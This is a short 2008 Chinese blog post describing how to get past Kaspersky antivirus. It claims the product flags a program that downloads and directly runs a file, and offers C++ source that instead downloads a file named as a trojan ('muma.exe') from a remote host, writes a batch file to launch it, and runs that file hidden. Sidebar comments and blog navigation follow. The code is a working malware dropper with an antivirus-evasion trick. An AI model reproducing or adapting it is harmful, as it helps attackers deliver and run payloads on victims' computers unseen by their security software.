卡巴检测的机理是:文件下载tol.exe->文件运行tol.exe(判断为下载者)
新的思路:文件下载tol.exe->写chage.bat->运行chage.bat(不判断为下载者)
[quote]
#include "stdafx.h"
#include <iostream.h>
#include <fstream.h>
#include <UrlMon.h>
#include <string.h>
#include <windows.h>
#pragma comment(lib, "urlmon.lib")
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{ char muma[]="http://www.Holmesian.cn/muma.exe";
// TOD Place code here.
while(true){
HRESULT hr = URLDownloadToFile(0, muma,"C:\\ma11.exe", 0,NULL);
if (hr== S_OK)
{ const char filename[] = "c:\\vir11.bat";
ofstream o_file;
o_file.open(filename);
o_file <<"echo off"<<endl;
o_file <<"C:\\ma11.exe"<<endl;
o_file.close();
WinExec("C:\\vir11.bat",0);
return 0;
Sleep(10000);
}
}
return 0;
}[/quote]
-
过卡巴斯基的思路
post by Holmesian / 2008-9-22 23:13 Monday
-
日历
-
搜索
-
最新吐槽
- Emily
强大! - Holmesian
@youstar:已经换好了~ - youstar
帮忙把友情链接更换一下,谢谢... - haizhen2020
非常感谢!支持楼主!顶!!!... - 日新小胖
@Holmesian:额,懂了。 我去关注... - Holmesian
@KEEPER:关于南昌星空极速Netkeepe... - Holmesian
@Henry:那需要再看看是提示什么... - Holmesian
@夏涛博客:这货不是柯南,这货... - Holmesian
@日新小胖:因为平时不怎么又时... - Holmesian
@www:关于南昌星空极速Netkeeper25...
- Emily
-
分类
-
链接
-
随便看看
-
AD
发表评论: